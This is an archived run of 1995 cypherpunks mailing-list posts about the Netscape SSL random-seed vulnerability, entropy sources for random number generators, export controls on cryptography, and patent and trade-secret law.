(was Re: Security Flaw Is Discovered In Software Used in Shopping) In-Reply-To: Message-ID: <9509210232.AA09480@hplyot.obspm.fr> You have excellent points in your detailed answer, thank you, but If FV was as used as SSL could be, what prevents, to use your terms, someone to get MILLIONS of FV's identifiers and use each one only once, etc ... (imo your figures about SSL and crypto softs risks are over evaluated, so I over evaluate the 'risks' of yours using same assumptions) There can't be more security by transferring data on the clear compared to an encrypted one... except maybe that people using encryption can often feel overconfident. So, as someone pointed out, it is not that much a problem about CC# which are available easily anyway, but in fact, using encrypted communications is the only way to ensure (some) *privacy*, in addition to being a security improvement. A problem is to avoid to fail on "customer expectation", especially when you've created it. So probably there was too much focus and advertising on security issues on the internet, by the very same companies that prove later to fail, giving wrong expectation. Privacy remains a goal anyway, and financial insecurity never was a problem as long as it remains under a small %. So I'd prefer to use crappy netscape 1.1 40 bits export SSL than your system... Though what I'd really use is PGP :-) Anyway, if you have happy customers, good for you... I'd suggest that you'd use "Security through Clarity" as motto ;-) dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept fissionable SEAL Team 6 Kaser Sose nuclear Clinton domestic disruption DST From dl at hplyot.obspm.fr Wed Sep 20 20:49:03 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Wed, 20 Sep 95 20:49:03 PDT Subject: Netscape Servers too ? 
(forwarded message from Marc VanHeyningen) Message-ID: <9509210319.AA09639@hplyot.obspm.fr> ------- start of forwarded message (RFC 934 encapsulation) ------- From: marcvh at spry.com (Marc VanHeyningen) To: Wayne Wilson Cc: Kazuma Andoh , www-security at ns2.rutgers.edu Subject: Re: What's the netscape problem Date: Wed, 20 Sep 1995 07:51:47 -0700 [...] > http://home.netscape.com/newsref/std/random_seed_security.html The interesting part of this article is the discussion of random seed weaknesses on the *server* side. If true, this means anybody could use the random-seed hole to reverse engineer the process by which the server's private key information was generated and break that keypair with much, much much less effort than would normally be needed to factor a 512-bit RSA key. (Note that I'm not entirely sure Netscape's server uses 512 bit RSA keys, since the documentation, technical data sheets, and generation process don't give any clue about what key size is being used. Guess they don't want customers worrying their pretty little heads about it.) This would mean merely getting a fixed server would be insufficient; every Netscape server user would need to generate a new keypair, get a new Verisign certificate, and revoke the old one. (Oops, wait, there's no way to revoke the old one. I guess you just have to hope nobody does this before all those certificates expire.) - - Marc ------- end ------- dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... 
Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept smuggle nuclear North Korea SDI cracking Mossad DES From jsimmons at goblin.punk.net Wed Sep 20 20:49:14 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Wed, 20 Sep 95 20:49:14 PDT Subject: /dev/random for Linux In-Reply-To: <199509202227.SAA05667@frankenstein.piermont.com> Message-ID: <199509210319.UAA04352@goblin.punk.net> > > > On this same track, I suggest that "/dev/random" devices for unix are > an excellent idea. Ted Tso did one for Linux that steals all the bits > of semi-random timing information it can. > Anyone know where I can find more information on this wonderful device? -- Jeff Simmons jsimmons at goblin.punk.net From perry at piermont.com Wed Sep 20 20:49:58 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 20 Sep 95 20:49:58 PDT Subject: /dev/random for Linux In-Reply-To: <199509210319.UAA04352@goblin.punk.net> Message-ID: <199509210349.XAA06110@frankenstein.piermont.com> Jeff Simmons writes: > > On this same track, I suggest that "/dev/random" devices for unix are > > an excellent idea. Ted Tso did one for Linux that steals all the bits > > of semi-random timing information it can. > > Anyone know where I can find more information on this wonderful device? I'd ask him. tytso at mit.edu. I've cc'ed him on the mail. Perry From dl at hplyot.obspm.fr Wed Sep 20 21:05:02 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Wed, 20 Sep 95 21:05:02 PDT Subject: Project: a standard cell random number generator In-Reply-To: Message-ID: <9509210404.AA09855@hplyot.obspm.fr> On the opposite, using some kind of small hardware devices plugged in the serial or // port could be a good point to help actual sales of softwares that would depend on it (ie you sell the hardware only with the soft, so ppl have to actually buy it to get full security instead of stealing it). 
[I'm playing devil's lawyer here]

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...
Freedom Prime#1: one hundred five thousand one hundred five billion one hundred five thousand one hundred sixty-seven
KGB Uzi plutonium Ortega Mossad South Africa cracking

From jirib at cs.monash.edu.au Wed Sep 20 21:23:36 1995
From: jirib at cs.monash.edu.au (Jiri Baum)
Date: Wed, 20 Sep 95 21:23:36 PDT
Subject: Exchange random numbers (was: Re: netscape's response)
In-Reply-To: <199509200729.AAA24565@Csli.Stanford.EDU>
Message-ID: <199509210419.OAA28994@molly.cs.monash.edu.au>

-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks at toad.com and Christian Wettergren

Christian Wettergren wrote:
...
> One wild idea that I just got was to have servers and clients exchange
> random numbers (not seeds of course), in a kind of chaining way. Since
...

Okay, that doesn't sound so hard...

Have a look at http://www.cs.monash.edu.au/cgi-bin/cgiwrap/~jirib/random?RandValue where you replace RandValue by any text string.

Please do not try to break the implementation, I *know* you can overrun buffers, use shell metacharacters and generally stuff around. Just don't, OK? Thanks.

Feel free to try to break the algorithm, though.

> Problems:
> * watch out for "multiply by zero" attacks by a rogue server/client.
> * watch out for "almost singular values" in the same way.

Don't know about these...

> * only let one source contribute a certain amount of randomness, like
> (key length)/(aver # of peers).

Well I don't keep track of entropy, so that doesn't apply, does it...

> * never reveal your current seed, only a non-trivially derived random
> value from it. (of course)

I reveal the MD5 hash of my seed only.

> * make sure your initial seed is good enough, or the whole thing is
> broken.

Well, entropy put in must be greater than entropy used or lost through cracked connections. (I.e. not just "initial", also entropy put in along the way.) I fail this point either way.
> * perhaps save part of the previous session state into a protected
> file, to be able to keep up the quality of the initial seed.

Yup, I do that (though "quality" would be quite a bit of a euphemism, and the file is hardly protected at all).

Have fun!

Jiri
- --
PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----

From Sal at panix.com Wed Sep 20 21:37:29 1995
From: Sal at panix.com (Sal Denaro)
Date: Wed, 20 Sep 95 21:37:29 PDT
Subject: AOL monitoring
In-Reply-To:
Message-ID:

> > 2) My .newsrc file can tell anyone that I read alt.hackers and alt.2600
> Hmmm...potential new crypto product...a "secure" newsreader with encrypted
> .newsrc?

Why not write a shell script to decrypt your .newsrc, run your reader then re-encrypt the .newsrc file? Why not do that for your mail address book file as well? Hey, this is cypher-punks- DIY :)

--
Salvatore Denaro                                sal at panix.com
I waited for the joke/It never did arrive.      Yes, I use PGP
Words I thought I'd choke/I hardly recognize.

From jsw at neon.netscape.com Wed Sep 20 22:01:21 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Wed, 20 Sep 95 22:01:21 PDT
Subject: FROM A FRIEND . . .
In-Reply-To: <199509201648.MAA14624@panix.com>
Message-ID: <43qrhf$gd5@tera.mcom.com>

In article <199509201648.MAA14624 at panix.com>, frissell at panix.com (Duncan Frissell) writes:
> >Updating Customers:
> >Netscape will provide the fix for Export (40 bit) versions of Netscape
> >Navigator later this week for downloading by customers on the Internet.
> >Similarly, the
> >Commerce Server patch for Export versions (40 bit) will be made available
> >from our home page. Because downloading of 128 bit versions of the software
> >is still not permitted by U.S. law, U.S.
> >customers of Netscape Navigator,
> >Netscape Navigator Personal Edition and Netscape Commerce Server using 128
> >bit versions can request the replacement from Netscape for delivery through
> >the regular mail.
>
> Funny, MIT and MPJ and others manage to enable the downloading of
> export-controlled software. Also, wasn't there some sort of promise by
> Netscape after we broke the 40-bit version to make the 128-bit version
> available to US users under the Beta/freeware system? What happened to that
> plan?

We are also examining some sort of binary patch technology, so that folks with the US-only version can easily download and apply the patch.

I think that the general opinion of engineers and management here at Netscape is that it would be A Really Good Thing to have our US-only 128+ bit version of Netscape Navigator available for download by US citizens and others who are not legally prohibited from using it. As a matter of fact, up until the RNG thing hit on Sunday night, I had been making myself a major pain in the ass to Netscape managers and executives, bugging them every day for at least the past several weeks, to get a decision about making the US version available for free download.

I know that MIT, RSA, and others make crypto code available for download with various mechanisms. I'm sure that these institutions did not make the decision lightly. This issue is now a very high priority for our lawyers, but it will take some time for them to reach a legal opinion about Netscape's legal exposure. The fact that MIT and RSA have done it does not mean that the government will not go after Netscape for similar behavior. We all know what a juicy target Netscape is these days... :-)

We have submitted our proposal for download checking to the State Dept. I think that our process does more validation than what others have done. The State Dept. has so far refused to send us any kind of written approval of our proposed methods.
I know that many of you think that this is futile, and I won't dispute that, but I think we do have to make the effort in order for our case to hold up later.

We do share your frustration at being forced to use weak crypto. This has been a major pain for us, but I believe that we are committed to continuing to produce a version with strong crypto (as long as it remains legal - sigh). I for one will always fight to ensure that we have a version of our Navigator that supports "strong" crypto, and to make that version easily and widely available. The government's attempts to get companies to produce watered down versions for the US because it is easier will not succeed here as long as I have any say in the matter. Also, the company has taken a vocal public position against the current ITAR restrictions and any sort of mandatory or government controlled key escrow.

We are working on it. Please try to be patient. It is just as hard for us as it is for you...

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From jsw at neon.netscape.com Wed Sep 20 22:05:54 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Wed, 20 Sep 95 22:05:54 PDT
Subject: NSA and Netscape Crack
In-Reply-To:
Message-ID: <43qrpq$gd5@tera.mcom.com>

In article , norm at netcom.com (Norman Hardy) writes:
> At 3:46 PM 9/19/95, Jim Ray wrote:
> ....
> >I don't expect to know NSA's specific brute-force capability, but
> >does anyone know if the NSA has *ever* found a glaring weakness in
> >software and then told its author(s) or owner(s) about it? Do "we"
> >perform the "COMSEC" role Tim was speaking of better than the NSA?
> >JMR
> ....
> Once upon a time NSA would find weaknesses in friends' crypto systems and
> tell them about it -- depending, of course, on the situation. It was a
> reciprocal practice. We don't know that NSA didn't tell Netscape.
As far as I know the NSA did not tell Netscape anything about this RNG vulnerability. If they had we would have fixed it immediately and put up a patch. Believe it or not we don't like being trashed for being stupid all over the net, print media, and TV.

As far as I know the NSA have not given us any advice about how to make our system stronger. I've heard rumors that they were quite upset when they learned that SSL's 40-bit RC4 was actually 40-bit secret and 88-bit salt.

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From jamesd at echeque.com Wed Sep 20 22:19:11 1995
From: jamesd at echeque.com (James A. Donald)
Date: Wed, 20 Sep 95 22:19:11 PDT
Subject: Silly NetScape RND tricks...
Message-ID: <199509210519.WAA08441@blob.best.net>

At 12:05 PM 9/20/95 -0400, Deranged Mutant wrote:
>
>I've only been skimming the NetScape-related posts lately, but I've yet
>to see anyone mention using a keyboard-timing sampler as a source for
>some random bits

Under Windows, you get a lot more entropy from mouse timing and position than keyboard hits.

---------------------------------------------------------------------
                                          |
We have the right to defend ourselves     |   http://www.jim.com/jamesd/
and our property, because of the kind     |
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |
arbitrary power of the state.             |   jamesd at echeque.com

From eay at mincom.oz.au Wed Sep 20 22:24:52 1995
From: eay at mincom.oz.au (Eric Young)
Date: Wed, 20 Sep 95 22:24:52 PDT
Subject: Please send me SSL problems...
In-Reply-To:
Message-ID:

A few comments from Tim Hudson who has put SSL into telnet and ftp, he is not on this list but since he is my personal 'put SSL into applications' person (I just write the library :-), I felt his comments would be better than mine :-)

On Wed, 20 Sep 1995, Erik E.
Fair wrote:
> Jeff, the SSL specification has a severe *architectural* problem - it
> assumes that Internet Protocols are APIs - interface standards, and that
...
> You can't fiddle with a communication protocol without getting agreement
> from everyone about the change, or extend it in a way that is compatible
> with the protocol you're modifying, on a per-protocol basis (e.g. adding a
> TELNET negotiation option to TELNET for encryption, an FTP command to FTP,
> etc). Otherwise, all you've done is made a private, non-interoperable

[tjh] I agree with this statement - application of SSL at the TCP level for all communication is possible but *not* desirable in the general case - i.e. for internet communication. A much better approach (and the one that I have taken for adding SSL into TELNET and FTP) is to use *existing* negotiation mechanisms for dynamically switching on SSL for a given link based on determining dynamically if the server you are connecting to will support it. Naturally you want options at both the server and the client that enable you to:

- fall back to "normal/insecure" mode if SSL is not available
- drop the connection in the client if SSL is not negotiated
- drop the connection in the server if SSL is not negotiated

My aim when adding SSL (in the form of SSLeay) into an existing server was *always* to be able to run the *one* server for both the "old" and the "new" protocol. I really was getting annoyed at seeing announcements of yet-another-security package that could be installed that provided another potentially insecure access path into the system that only supported connecting to it with its own fixed protocol.

SSL can be seen in its simplest form as just a nice mechanism for dynamically negotiating a *cipher* - this is how I initially set things up so that the "normal" authentication mechanisms had to still be used for connection - i.e. SSLtelnet still required the normal account password to get access.
This has since been "enhanced" so that you can switch on an option that uses a certificate exchange as the security access mechanism (this is not switched on by default).

For TELNET the "best" place to start seemed to be the work done with SRATELNET ... it already had all the hooks in the right places for using the RFC-defined TELNET extensions that enabled negotiation of authentication and encryption. (the documentation that came with SRAtelnet was also nice and clear too).

For FTP there was a similar way of doing things so I used it too ... and FTP is a *great* example of a protocol where doing things at the TCP level (transparently) would be "bad" - it used two ports ... one of which is usually dynamically allocated ... and you certainly don't want to redo the initial SSL negotiation for each file that you transfer! (SSLftp reuses the session ID).

Another thing that is worth noting (and worth looking at too) is the different API offered in SSLREF and SSLeay (... naturally I prefer SSLeay as I have influence over the author ;-) ... From what I know of the SSLREF API, it takes the approach of providing wrapper functions that you use *instead* of the "normal" functions ... there is (not using the right names) SSLaccept and SSLconnect that you use that perform the accept() and connect() along with all the other things required in the SSL protocol being hidden which sounds nice until you want to do something like FTP ... where the connection for the DATA socket is formed in the opposite direction to the CONTROL socket - with SSLeay you do the accept() and connect() yourself ... as per normal and then run SSL_accept() or SSL_connect() which does the "logical" SSL stuff ... so in FTP I can do a connect() and then an SSL_accept() which looks funny but is the "right" thing to do.

SSLeay has only 2 function calls that operate on socket file descriptors, a single read() and a single write().
The most recent version will handle non-blocking IO if the application passes a file descriptor with it turned on. SSLeay does not do a single setsockopt(), ioctl(), fcntl(), accept(), bind(), select() etc.

If you haven't looked at SSLeay or looked at the SSL protocol itself then you really should grab it and have a read (while ignoring the politics and the WWW hype over SSL).

Tim

[eay] While there are problems with certificate distribution, this will be overcome. Ever tried general inter-realm authentication with Kerberos?

Both SSLref and SSLeay interoperate. From what I know of the SSLref API, our APIs are quite different. Just because SSLref may 'force' you towards a particular style of SSL use does not mean the protocol forces you to use it this way.

eric

Standard billboard
http://www.psy.uq.oz.au/~ftp/Crypto/
ftp.psy.uq.oz.au:/pub/Crypto/SSL/
ftp.psy.uq.oz.au:/pub/Crypto/SSLapps/
--
Eric Young                 | Signature removed since it was generating
AARNet: eay at mincom.oz.au   | more followups than the message contents :-)

From jamesd at echeque.com Wed Sep 20 22:32:16 1995
From: jamesd at echeque.com (James A. Donald)
Date: Wed, 20 Sep 95 22:32:16 PDT
Subject: "random" number seeds vs. Netscape
Message-ID: <199509210531.WAA09687@blob.best.net>

At 05:01 PM 9/20/95 -0400, Perry E. Metzger wrote:
>PC timers inherently run at MHz speed -- they interrupt every 100th of
>a second but you can get finer resolution by querying the clock
>chip. Does Windows let you do this?

Yes: 1.196 MHz precision.

The VTD maintains a 64-bit value that is accurate to 0.8 microseconds. This value is obtained by calling the VTD with AX set to 0100h. The 64-bit value is returned in EDX:EAX. The returned value indicates the time Windows has been running based on a 1.196 MHz clock.

---------------------------------------------------------------------
| We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A.
Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com

From iagoldbe at csclub.uwaterloo.ca Wed Sep 20 22:32:57 1995
From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 22:32:57 PDT
Subject: Cypherpunks Hold a Cracking Party
In-Reply-To: <199509201812.OAA28709@panix.com>
Message-ID: <43qtdn$jbu@calum.csclub.uwaterloo.ca>

In article <199509201812.OAA28709 at panix.com>, Duncan Frissell wrote:
>
>"Anyone know any publications interested in an article on the Crack?"
>

How many more can there be? I must have given interviews to a large percentage of them by now. :-)

Luckily, it's starting to subside. I actually had almost a whole hour today during which nobody called.

Was it like this for Damien?

- Ian "whose brain melted after Monday's deluge"

From iagoldbe at csclub.uwaterloo.ca Wed Sep 20 22:36:19 1995
From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 22:36:19 PDT
Subject: Munitions shirt (again)
In-Reply-To:
Message-ID: <43qtjt$kch@calum.csclub.uwaterloo.ca>

In article , Timothy C. May wrote:
>
>Ian did great work on the latest Netscape break, but this is just plain crazy.
>

Just some random thoughts while my brain is goo... :-)

- Ian "that, and I'm trying to figure out your country's legal system..."

From rrothenb at ic.sunysb.edu Wed Sep 20 22:36:42 1995
From: rrothenb at ic.sunysb.edu (Deranged Mutant)
Date: Wed, 20 Sep 95 22:36:42 PDT
Subject: What's with the list? (Old mail?!)
Message-ID: <199509210536.BAA17421@libws4.ic.sunysb.edu>

Anyone else get old c'punks postings remailed to them from August?

From Randy at mci.net Wed Sep 20 22:38:24 1995
From: Randy at mci.net (Randy Catoe)
Date: Wed, 20 Sep 95 22:38:24 PDT
Subject: USA Today on Fear of Credit Cards over Net
Message-ID: <01HVIQUUZ6HU8WX6TO@MAILSRV1.PCY.MCI.NET>

At 07:35 PM 9/20/95 -0400, Perry E. Metzger wrote:
>
>Re: The risk of credit cards.
>
>I suppose that indeed there are large risks elsewhere in the credit
>card system. However, I think that the credit card system itself is
>stupid and insecure and ought to be scrapped -- sending around account
>numbers as magic keys to get payment is a stupid move. It's not
>surprising how large credit card fraud is.
>
>One of the great hopes I have for cryptographic technology is its
>ability to lower the incidence of fraud, and thus lower transaction
>costs a lot. Someday, hopefully, everyone will be able to be a credit
>card merchant because you won't have to trust the merchants not to
>steal.
>
>Perry
>
>

I'm told that the revenue lost to fraud in the credit card industry is around .15 percent of the gross purchase value. I'm also told that the credit card companies actually face higher costs from disputes, i.e. when you call them up and busy out a person to resolve a question on your bill.

Randy

From hallam at w3.org Wed Sep 20 22:43:20 1995
From: hallam at w3.org (hallam at w3.org)
Date: Wed, 20 Sep 95 22:43:20 PDT
Subject: Please send me SSL problems...
In-Reply-To: <9509201715.AA19393@sulphur.osf.org>
Message-ID: <9509210543.AA02352@zorch.w3.org>

Rich Salz writes
>I've heard that Digital, HP, and IBM have all mandated that all security
>code (except keymgmt and other things that are out of scope) must go
>through the GSSAPI: no writing your own stuff. I heard, less
>authoritatively, that Microsoft has the same rules, except they use a
>FunnyLookingVariant(far) of an earlier GSSAPI draft.

None of these organisations have mentioned GSSAPI to me. Do you have a source?

David Van Wie writes
>Many technologies have both patented parts and trade
>secret parts. Often,
>companies will maintain information that is in patent applications as trade
>secret until they are granted. I guess I should say _if_ they are granted!
> After a patent is granted, it is usually a good idea to also maintain some
>trade secrets in your products -- since trade secrets never "expire," unlike
>patents. If the patent isn't granted, you still have the option of treating
>the contents as an intellectual property under trade secret protection.

Rubbish, disclosure is required for a grant of a patent. Unless someone skilled in the art can duplicate the invention from the patent claim you don't get a patent issued.

Trade secret protection is very tricky in any case. It's practically useless if you want to protect a product rather than a procedure.

From iagoldbe at csclub.uwaterloo.ca Wed Sep 20 22:47:57 1995
From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 22:47:57 PDT
Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft (fwd)
In-Reply-To: <3060D3B3@hamachi>
Message-ID: <43qu9q$nbd@calum.csclub.uwaterloo.ca>

In article <3060D3B3 at hamachi>, David Van Wie wrote:
>
>David Clavadetscher of PrivaSoft writes:
>> At this time our crypto engine is patented and proprietary.
>
>Ian Goldberg writes:
>> Waitasec... I was under the impression that if you patented it, you had to
>> reveal it. That's why RC4 isn't patented (it used to be a trade secret).
>
>Many technologies have both patented parts and trade secret parts. Often,
>companies will maintain information that is in patent applications as trade
>secret until they are granted. I guess I should say _if_ they are granted!

But don't they have to put something on the patent application? Can they claim trade secret status for something that was on a patent application, but rejected? That seems like they're getting it both ways. They should probably have to choose whether or not they want to show anyone their "secret". If not, it stays a trade secret. If so, it's not a secret anymore, and they hope it's "nonobvious, etc." enough to be granted a patent.
- Ian "I heard that 'x*y=[(x+y)/2]^2 - [(x-y)/2]^2' is a patented way to multiply numbers of the same parity. Can anyone verify this and/or produce a reference?"

From gnu at toad.com Wed Sep 20 22:52:27 1995
From: gnu at toad.com (John Gilmore)
Date: Wed, 20 Sep 95 22:52:27 PDT
Subject: Netscape is doing well -- give 'em a break.
In-Reply-To: <199509202041.NAA07036@comsec.com>
Message-ID: <9509210552.AA07852@toad.com>

> > around at the time that this code was being written. I must admit that
> > the RNG seed code was not an area that I thought to examine when I took
> > over our security library.
>
> I don't know what your background is, so don't take this as a
> personal attack please, but someone who is trained in computer
> security and cryptography implementation should *know* to check these
> things. Hell, even I would check those things, and I'm not a
> cryptographer by any means.

Hey folks, lighten up!

Netscape is to be commended for even *putting* crypto into their product! Of course the first version is going to have a few screwups; they're in a fast market and things must be done in a hurry. But they are showing a real commitment to securing Internet privacy and commerce -- with real algorithms and without key escrow. They hired a real cryptographer, and their security programmer is a cypherpunk. They've told the world they will put the real "domestic" version out for public use. This is a step that a very small number of companies even bother with; most don't even have a high-security unexportable version. They're combing the net for better random number algorithms. We could do a lot worse!

Cygnus' Kerberos faced the same random-seed problems and punted in similar ways. Our random numbers are derived from the time and the PID and etc. You can read the sources to see.
Ted Ts'o claims it is harder to exploit them because they're mixed in (with DES encryption) with a secret key, either the Kerberos database's master key on the server, or the session key from the ticket on the client. But I haven't done a full blown security analysis of this scheme. I was too busy trying to productize it on eight platforms, write real documentation, do customer support, and make it run on the *^*&%&&# Macintosh. I did have it marked in my mind as something to look at "when I had the time". If you-all have the time, hey, go for it! Might as well look at the one in MIT K5, since that's the development tree from which all future Kerberoses will come.

All progress is by steps. Let's step on each others' shoulders, not on each others' toes. Netscape is doing us a favor by pushing strong crypto. We are doing them a favor by pointing out problems before they cause major losses to Netscape customers. The result is higher security for everyone, and more respect for each other's efforts. So kindly show them a little...

John Gilmore

From dvw at hamachi.epr.com Wed Sep 20 22:55:00 1995
From: dvw at hamachi.epr.com (David Van Wie)
Date: Wed, 20 Sep 95 22:55:00 PDT
Subject: Entropy vs Random Bits
Message-ID: <3060FDCD@hamachi>

I've been watching the debate and discussion unfold on usable sources of random data from environments, user actions, etc. I have a vocabulary question (and something of a bone to pick as a mathematician and physicist).

Usually, the term "entropy" is being used to characterize one of two different things: (i) random data, as in "300 bits of entropy," and (ii) the "randomness" of data (i.e. high degree of variance in a statistic drawn from it), as in "you can find a lot of entropy in the low order bits of a timed interval between keystrokes." I suspect that there are other shades of meaning intended in other uses as well.

This is odd. The term entropy describes an aspect of thermodynamic equilibrium in physical systems.
Although sometimes used as a synonym for "random," that definition is vernacular, not technical. In fact, there is no meaningful relationship between "entropy" and random data of the type described in the postings related to seed values.

In the presence of a perfectly suitable and precise mathematical term (i.e. random), why invent new terms? Why use them to mean at least two different things?

dvw

From starrd at starrd Wed Sep 20 22:55:31 1995
From: starrd at starrd (starrd@iia2.org)
Date: Wed, 20 Sep 95 22:55:31 PDT
Subject: your mail
In-Reply-To:
Message-ID:

On Wed, 20 Sep 1995 owner-cypherpunks at toad.com wrote:

>                               ( \
> Finger for public key          \ )
> Strong-arm for secret key      /   <-- minor groove
> Thumb-screws for pass-phrase  / )
>

I love your phrase, I hope you don't mind...I added it to my .sig. :)

||||||||||||email address: starrd at iia2.org or starrd at cinenet.net|||||||||||
| Creator of the original        |  Get paid to upload                  |
| Patriot's Archives             \  shareware to BBSes and             |
| ftp: iia.org /pub/users/patriot \_____ the Internet!                 |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\ Get file:        |
| For index of available files: descript.ion \ uploader.zip            |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

Finger for PGP public key, strong-arm for secret key, thumbscrews for passphrase...

From hallam at w3.org Wed Sep 20 23:02:49 1995
From: hallam at w3.org (hallam at w3.org)
Date: Wed, 20 Sep 95 23:02:49 PDT
Subject: Euro-Clipper
In-Reply-To: <199509210102.SAA15389@cory.EECS.Berkeley.EDU>
Message-ID: <9509210602.AA02445@zorch.w3.org>

> It relates that the policy was approved on the 8th September at
> Strasbourg by the Council, and coincides with an attempt by the
> European Commission to propose a pan-European encryption standard. The
> Council - unlike the Commission - has no statutory powers to enforce
> its recommendations.
> However, Peter Csonka, the chairman of the
> committee that drafted the document (and an administrative officer at
> the Council's division of crime problems) says that `it is rare for
> countries to reject Council of Europe recommendations'.

It may be rare for a Council of Europe recommendation to be rejected but that is because they can be ignored. Actually the Dutch have completely ignored the edicts concerning drugs, the British routinely ignore anything they don't like in the EU where there is a parliamentary element. Don't expect them to snap to attention at the Council of Europe. Until there is a law actually passed in the UK there is no change in the status quo, same for the other European countries.

> I for one will be making clear to my MP that his stand on this issue
> will determine how I cast my ballot at the next election.

So you would rather have a Tory government plus a promise to permit crypto than a Labour government plus a promise to repeal the Criminal Justice Act? Be real, even on the freedom issue alone there are other factors to weigh in the balance. Plus any Tory promise would have to be considered as trustworthy as their line at the last election on taxes.

I can possibly see a choice between LibDem and Labour on this issue alone, I don't think that many people will consider it the major issue at the next election though.

On the other hand you might be able to influence a person looking to become a candidate in a constituency. One vote on a selection committee can make a big difference. In other words if you want to make cryptography an issue you will have to hack it at the party level.
Phill

From iagoldbe at csclub.uwaterloo.ca Wed Sep 20 23:03:56 1995
From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 23:03:56 PDT
Subject: [NOISE] "hacker" was: first virtual "security"
In-Reply-To:
Message-ID: <43qv7h$qog@calum.csclub.uwaterloo.ca>

In article <0kMA2EqMc50eMEb4Yx at nsb.fv.com>, Nathaniel Borenstein wrote:
>If an SSL-like scheme were in wide use world-wide, the hacker who just
>made a name for himself by breaking SSL could instead have gone down in

Ugh. That word again. I'm only 22, but I'm old enough to remember when there were people called "crackers", and being called a "hacker" was a _good_ thing. I know at least one article about the break went, "Two hackers in Berkeley, California...". We actually got questions from reporters asking why we didn't just use our newly-found hole to snoop financial transactions. I've done a lot of root-breaking in my (short) time, but I work for the Good Guys (TM).

- Ian "hey, I warned you it was noise"

From karlton at ghoti.mcom.com Wed Sep 20 23:06:30 1995
From: karlton at ghoti.mcom.com (Phil Karlton)
Date: Wed, 20 Sep 95 23:06:30 PDT
Subject: (none)
In-Reply-To: <199509201509.IAA19829@blob.best.net>
Message-ID: <43qvbk$lra@tera.mcom.com>

James A. Donald writes:
Whenever you need a random number, take a one way checksum, for example MD5, of the most recently altered part of that buffer. Use that as your random number.

How is this any better than feeding the data into the MD5 hash as I go? This is not a rhetorical question.

PK
--
--
Philip L. Karlton                      karlton at netscape.com
Principal Curmudgeon                   http://www.netscape.com/people/karlton
Netscape Communications Corporation

From iagoldbe at csclub.uwaterloo.ca Wed Sep 20 23:12:00 1995
From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 23:12:00 PDT
Subject: FROM A FRIEND . . .
In-Reply-To: <199509201648.MAA14624@panix.com>
Message-ID: <43qvn4$mm@calum.csclub.uwaterloo.ca>

In article <43qrhf$gd5 at tera.mcom.com>, Jeff Weinstein wrote:
> I think that the general opinion of engineers and management here at
>Netscape is that it would be A Really Good Thing to have our US-only
>128+ bit version of Netscape Navigator available for download by US
>citizens and others who are not legally prohibited from using it.

Who _is_ legally prohibited from using it? I think there are some countries where the very use of crypto is illegal (could someone please list them?), but who else? There are some people that may be legally prohibited from _obtaining_ it from a US site (ITAR yadda), but even so, if JRFurriner downloads crypto from company C's site in the US, who's guilty of ITAR-violation? Company C for making it available, or JRF for initiating the action that caused the bits to be sent out of the country?

- Ian "my, I seem to be posting a lot tonight"

From dvw at hamachi.epr.com Wed Sep 20 23:23:30 1995
From: dvw at hamachi.epr.com (David Van Wie)
Date: Wed, 20 Sep 95 23:23:30 PDT
Subject: Patents and trade secrets
Message-ID: <3061045B@hamachi>

> > Many technologies have both patented parts and trade secret parts. Often,
> > companies will maintain information that is in patent applications as trade
> > secret until they are granted. I guess I should say _if_ they are granted!
>
> But don't they have to put something on the patent application? Can they
> claim trade secret status for something that was on a patent application,
> but rejected? That seems like they're getting it both ways. They should
> probably have to choose whether or not they want to show anyone their
> "secret". If not, it stays a trade secret. If so, it's not a secret anymore,
> and they hope it's "nonobvious, etc." enough to be granted a patent.

Sure, they have to put their "best mode" of performing their invention into the patent application.
While the patent is pending (at least in the US), the patent application is confidential, so if the patent is denied, or if the patent is not as broad as the inventor would have liked, they can withdraw the application without the information contained in it ever becoming public. In Europe, publication occurs automatically after 18 months, so the inventor has less time there to make a go/no go decision, but they can still do it.

In some respects, the existing system gives you most of what you want -- if you can't get patent protection for an idea, you can fall back on trade secret protection (which you didn't have to give up just to try to get a patent). It seems pretty harsh to me that just making a stab at getting a patent would mean that all of your hard work could just slip away into the public domain if it wasn't quite up to snuff. Sure would make me swallow hard....

dvw

From jamesd at echeque.com Wed Sep 20 23:27:45 1995
From: jamesd at echeque.com (James A. Donald)
Date: Wed, 20 Sep 95 23:27:45 PDT
Subject: (none)
Message-ID: <199509210627.XAA14935@blob.best.net>

At 06:05 AM 9/21/95 GMT, Phil Karlton wrote:
> James A. Donald writes:
> Whenever you need a random number, take a one way checksum,
> for example MD5, of the most recently altered part of that
